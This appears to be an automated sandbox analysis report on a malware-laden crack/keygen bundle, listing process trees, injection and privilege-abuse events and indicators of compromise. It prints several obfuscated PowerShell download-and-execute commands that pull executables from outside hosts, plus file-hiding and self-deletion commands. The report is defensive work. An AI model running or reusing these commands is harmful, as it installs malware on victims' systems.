Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	cc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3560	data.dat
3560	data.dat
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
2220	explorer.exe
2220	explorer.exe
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
2220	explorer.exe
2220	explorer.exe
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
2376	dw20.exe
2376	dw20.exe
2220	explorer.exe
2220	explorer.exe
428	powershell.exe
428	powershell.exe
3188	powershell.exe
3188	powershell.exe
428	powershell.exe
3188	powershell.exe
4136	powershell.exe
4136	powershell.exe
4368	powershell.exe
4368	powershell.exe
4136	powershell.exe
4368	powershell.exe
4136	powershell.exe
4368	powershell.exe
4884	mwh.exe
4884	mwh.exe
4900	gev.exe
4900	gev.exe
2220	explorer.exe
2220	explorer.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
3324	powershell.exe
3324	powershell.exe
3324	powershell.exe
2220	explorer.exe
2220	explorer.exe
4900	gev.exe
4900	gev.exe
4884	mwh.exe
4884	mwh.exe
4900	gev.exe
4900	gev.exe
4900	gev.exe
4900	gev.exe

Suspicious behavior: MapViewOfSection 46 IoCs

pid	Process
1276	bb.exe
1276	bb.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
5100	vkr.exe
4700	vbndfgame.exe
1764	cdvcxsdme.exe
2220	explorer.exe
2220	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1276	bb.exe
Token: SeRestorePrivilege	1276	bb.exe
Token: SeBackupPrivilege	1276	bb.exe
Token: SeLoadDriverPrivilege	1276	bb.exe
Token: SeCreatePagefilePrivilege	1276	bb.exe
Token: SeShutdownPrivilege	1276	bb.exe
Token: SeTakeOwnershipPrivilege	1276	bb.exe
Token: SeChangeNotifyPrivilege	1276	bb.exe
Token: SeCreateTokenPrivilege	1276	bb.exe
Token: SeMachineAccountPrivilege	1276	bb.exe
Token: SeSecurityPrivilege	1276	bb.exe
Token: SeAssignPrimaryTokenPrivilege	1276	bb.exe
Token: SeCreateGlobalPrivilege	1276	bb.exe
Token: 33	1276	bb.exe
Token: SeDebugPrivilege	2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
Token: SeDebugPrivilege	2220	explorer.exe
Token: SeRestorePrivilege	2220	explorer.exe
Token: SeBackupPrivilege	2220	explorer.exe
Token: SeLoadDriverPrivilege	2220	explorer.exe
Token: SeCreatePagefilePrivilege	2220	explorer.exe
Token: SeShutdownPrivilege	2220	explorer.exe
Token: SeTakeOwnershipPrivilege	2220	explorer.exe
Token: SeChangeNotifyPrivilege	2220	explorer.exe
Token: SeCreateTokenPrivilege	2220	explorer.exe
Token: SeMachineAccountPrivilege	2220	explorer.exe
Token: SeSecurityPrivilege	2220	explorer.exe
Token: SeAssignPrimaryTokenPrivilege	2220	explorer.exe
Token: SeCreateGlobalPrivilege	2220	explorer.exe
Token: 33	2220	explorer.exe
Token: SeIncreaseQuotaPrivilege	1332	wmic.exe
Token: SeSecurityPrivilege	1332	wmic.exe
Token: SeTakeOwnershipPrivilege	1332	wmic.exe
Token: SeLoadDriverPrivilege	1332	wmic.exe
Token: SeSystemProfilePrivilege	1332	wmic.exe
Token: SeSystemtimePrivilege	1332	wmic.exe
Token: SeProfSingleProcessPrivilege	1332	wmic.exe
Token: SeIncBasePriorityPrivilege	1332	wmic.exe
Token: SeCreatePagefilePrivilege	1332	wmic.exe
Token: SeBackupPrivilege	1332	wmic.exe
Token: SeRestorePrivilege	1332	wmic.exe
Token: SeShutdownPrivilege	1332	wmic.exe
Token: SeDebugPrivilege	1332	wmic.exe
Token: SeSystemEnvironmentPrivilege	1332	wmic.exe
Token: SeRemoteShutdownPrivilege	1332	wmic.exe
Token: SeUndockPrivilege	1332	wmic.exe
Token: SeManageVolumePrivilege	1332	wmic.exe
Token: 33	1332	wmic.exe
Token: 34	1332	wmic.exe
Token: 35	1332	wmic.exe
Token: 36	1332	wmic.exe
Token: SeIncreaseQuotaPrivilege	1332	wmic.exe
Token: SeSecurityPrivilege	1332	wmic.exe
Token: SeTakeOwnershipPrivilege	1332	wmic.exe
Token: SeLoadDriverPrivilege	1332	wmic.exe
Token: SeSystemProfilePrivilege	1332	wmic.exe
Token: SeSystemtimePrivilege	1332	wmic.exe
Token: SeProfSingleProcessPrivilege	1332	wmic.exe
Token: SeIncBasePriorityPrivilege	1332	wmic.exe
Token: SeCreatePagefilePrivilege	1332	wmic.exe
Token: SeBackupPrivilege	1332	wmic.exe
Token: SeRestorePrivilege	1332	wmic.exe
Token: SeShutdownPrivilege	1332	wmic.exe
Token: SeDebugPrivilege	1332	wmic.exe
Token: SeSystemEnvironmentPrivilege	1332	wmic.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
3560	data.dat
972	Keygen.exe
5100	vkr.exe
1764	cdvcxsdme.exe
4700	vbndfgame.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1160 wrote to memory of 4028	1160	amtemu.v0.9.2.win-painter_edited.exe	68
PID 1160 wrote to memory of 4028	1160	amtemu.v0.9.2.win-painter_edited.exe	68
PID 1160 wrote to memory of 4028	1160	amtemu.v0.9.2.win-painter_edited.exe	68
PID 4028 wrote to memory of 920	4028	cmd.exe	71
PID 4028 wrote to memory of 920	4028	cmd.exe	71
PID 4028 wrote to memory of 920	4028	cmd.exe	71
PID 4028 wrote to memory of 2120	4028	cmd.exe	72
PID 4028 wrote to memory of 2120	4028	cmd.exe	72
PID 4028 wrote to memory of 2120	4028	cmd.exe	72
PID 920 wrote to memory of 1408	920	key.exe	73
PID 920 wrote to memory of 1408	920	key.exe	73
PID 920 wrote to memory of 1408	920	key.exe	73
PID 1408 wrote to memory of 2176	1408	cmd.exe	75
PID 1408 wrote to memory of 2176	1408	cmd.exe	75
PID 1408 wrote to memory of 2176	1408	cmd.exe	75
PID 1408 wrote to memory of 3444	1408	cmd.exe	76
PID 1408 wrote to memory of 3444	1408	cmd.exe	76
PID 1408 wrote to memory of 3444	1408	cmd.exe	76
PID 4028 wrote to memory of 2088	4028	cmd.exe	77
PID 4028 wrote to memory of 2088	4028	cmd.exe	77
PID 4028 wrote to memory of 2088	4028	cmd.exe	77
PID 4028 wrote to memory of 688	4028	cmd.exe	78
PID 4028 wrote to memory of 688	4028	cmd.exe	78
PID 4028 wrote to memory of 688	4028	cmd.exe	78
PID 1408 wrote to memory of 3772	1408	cmd.exe	79
PID 1408 wrote to memory of 3772	1408	cmd.exe	79
PID 1408 wrote to memory of 3772	1408	cmd.exe	79
PID 1408 wrote to memory of 3560	1408	cmd.exe	80
PID 1408 wrote to memory of 3560	1408	cmd.exe	80
PID 1408 wrote to memory of 3560	1408	cmd.exe	80
PID 4028 wrote to memory of 3116	4028	cmd.exe	81
PID 4028 wrote to memory of 3116	4028	cmd.exe	81
PID 4028 wrote to memory of 3116	4028	cmd.exe	81
PID 4028 wrote to memory of 3716	4028	cmd.exe	82
PID 4028 wrote to memory of 3716	4028	cmd.exe	82
PID 4028 wrote to memory of 3716	4028	cmd.exe	82
PID 3116 wrote to memory of 1276	3116	bb.exe	83
PID 3116 wrote to memory of 1276	3116	bb.exe	83
PID 3116 wrote to memory of 1276	3116	bb.exe	83
PID 3116 wrote to memory of 1276	3116	bb.exe	83
PID 3116 wrote to memory of 1276	3116	bb.exe	83
PID 1276 wrote to memory of 2220	1276	bb.exe	86
PID 1276 wrote to memory of 2220	1276	bb.exe	86
PID 1276 wrote to memory of 2220	1276	bb.exe	86
PID 2088 wrote to memory of 1332	2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe	87
PID 2088 wrote to memory of 1332	2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe	87
PID 2088 wrote to memory of 1332	2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe	87
PID 4028 wrote to memory of 1808	4028	cmd.exe	89
PID 4028 wrote to memory of 1808	4028	cmd.exe	89
PID 4028 wrote to memory of 1808	4028	cmd.exe	89
PID 4028 wrote to memory of 1920	4028	cmd.exe	90
PID 4028 wrote to memory of 1920	4028	cmd.exe	90
PID 4028 wrote to memory of 1920	4028	cmd.exe	90
PID 4028 wrote to memory of 1308	4028	cmd.exe	92
PID 4028 wrote to memory of 1308	4028	cmd.exe	92
PID 4028 wrote to memory of 1308	4028	cmd.exe	92
PID 2220 wrote to memory of 920	2220	explorer.exe	71
PID 2220 wrote to memory of 920	2220	explorer.exe	71
PID 2220 wrote to memory of 1408	2220	explorer.exe	73
PID 2220 wrote to memory of 1408	2220	explorer.exe	73
PID 2220 wrote to memory of 2088	2220	explorer.exe	77
PID 2220 wrote to memory of 2088	2220	explorer.exe	77
PID 2220 wrote to memory of 3560	2220	explorer.exe	80
PID 2220 wrote to memory of 3560	2220	explorer.exe	80

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
2176	attrib.exe

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe

C:\Users\Admin\AppData\Local\Temp\amtemu.v0.9.2.win-painter_edited.exe
"C:\Users\Admin\AppData\Local\Temp\amtemu.v0.9.2.win-painter_edited.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\872D.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\amtemu.v0.9.2.win-painter_edited.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4028
- - C:\Users\Admin\AppData\Local\Temp\872D.tmp\key.exe
    key.exe
    3⤵
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Maps connected drives based on registry
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of WriteProcessMemory
    PID:920
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t28024.bat" "C:\Users\Admin\AppData\Local\Temp\872D.tmp\key.exe" "
      4⤵
      Drops file in Drivers directory
      Checks whether UAC is enabled
      Maps connected drives based on registry
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of WriteProcessMemory
      PID:1408
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h C:\Users\Admin\AppData\Local\Temp\ytmp
        5⤵
        Views/modifies file attributes
        
        PID:2176
    - - C:\Windows\SysWOW64\find.exe
        
        FIND /C /I "0.0.0.0 cracksmind.com" C:\Windows\system32\drivers\etc\hosts
        5⤵
        
        PID:3444
    - - C:\Windows\SysWOW64\find.exe
        
        FIND /C /I "0.0.0.0 www.cracksmind.com" C:\Windows\system32\drivers\etc\hosts
        5⤵
        
        PID:3772
    - - C:\Users\Admin\AppData\Local\Temp\afolder\data.dat
        
        C:\Users\Admin\AppData\Local\Temp\afolder/data.dat
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3560
- - C:\Windows\SysWOW64\timeout.exe
    TIMEOUT /T 1
    3⤵
    - Delays execution with timeout.exe
    PID:2120
- - C:\Users\Admin\AppData\Local\Temp\872D.tmp\Microsoft.VisualStudio.Package.LanguageService.11.0.exe
    Microsoft.VisualStudio.Package.LanguageService.11.0.exe
    3⤵
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Maps connected drives based on registry
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2088
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      "wmic" os get Caption /format:list
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1332
- - C:\Windows\SysWOW64\timeout.exe
    TIMEOUT /T 2
    3⤵
    - Delays execution with timeout.exe
    PID:688
- - C:\Users\Admin\AppData\Local\Temp\872D.tmp\bb.exe
    bb.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3116
  - - C:\Users\Admin\AppData\Local\Temp\872D.tmp\bb.exe
      "C:\Users\Admin\AppData\Local\Temp\872D.tmp\bb.exe"
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Checks processor information in registry
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1276
    - - C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        5⤵
        Modifies firewall policy service
        Checks BIOS information in registry
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Checks processor information in registry
        Enumerates system info in registry
        Modifies Internet Explorer Protected Mode
        Modifies Internet Explorer Protected Mode Banner
        Modifies Internet Explorer settings
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2220
- - C:\Windows\SysWOW64\timeout.exe
    TIMEOUT /T 3
    3⤵
    - Delays execution with timeout.exe
    PID:3716
- - C:\Users\Admin\AppData\Local\Temp\872D.tmp\puttty.exe
    puttty.exe
    3⤵
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Maps connected drives based on registry
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:1808
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
      dw20.exe -x -s 2176
      4⤵
      Maps connected drives based on registry
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:2376
- - C:\Windows\SysWOW64\timeout.exe
    TIMEOUT /T 4
    3⤵
    - Delays execution with timeout.exe
    PID:1920
- - C:\Users\Admin\AppData\Local\Temp\872D.tmp\ereds.exe
    ereds.exe
    3⤵
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Maps connected drives based on registry
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:1308
  - - C:\Users\Admin\AppData\Local\Temp\keygen.exe
      "C:\Users\Admin\AppData\Local\Temp\keygen.exe"
      4⤵
      PID:1072
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1D34.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\keygen.exe"
        5⤵
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Modifies registry class
        
        PID:832
      - C:\Users\Admin\AppData\Local\Temp\1D34.tmp\Keygen.exe
        
        Keygen.exe
        6⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:972
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1D34.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        6⤵
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1936
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
        7⤵
        Blocklisted process makes network request
        Maps connected drives based on registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:3324
        
        C:\Users\Public\vkr.exe
        
        "C:\Users\Public\vkr.exe"
        8⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:5100
        
        C:\Users\Admin\AppData\Local\Temp\cdvcxsdme.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cdvcxsdme.exe"
        9⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:1764
        
        C:\Users\Admin\AppData\Local\Temp\cdvcxsdme.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cdvcxsdme.exe"
        10⤵
        Executes dropped EXE
        
        PID:1440
        
        C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe"
        9⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:4880
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /pid 4880 & erase C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe & RD /S /Q C:\\ProgramData\\991295832238767\\* & exit
        11⤵
        
        PID:2424
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /pid 4880
        12⤵
        Kills process with taskkill
        
        PID:3068
        
        C:\Users\Public\vkr.exe
        
        "C:\Users\Public\vkr.exe"
        9⤵
        Executes dropped EXE
        
        PID:1320
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1D34.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        6⤵
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1392
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4696
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        6⤵
        Delays execution with timeout.exe
        
        PID:2728
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1D34.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        6⤵
        Checks whether UAC is enabled
        
        PID:964
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
        7⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:428
        
        C:\Users\Public\mwh.exe
        
        "C:\Users\Public\mwh.exe"
        8⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of SetThreadContext
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
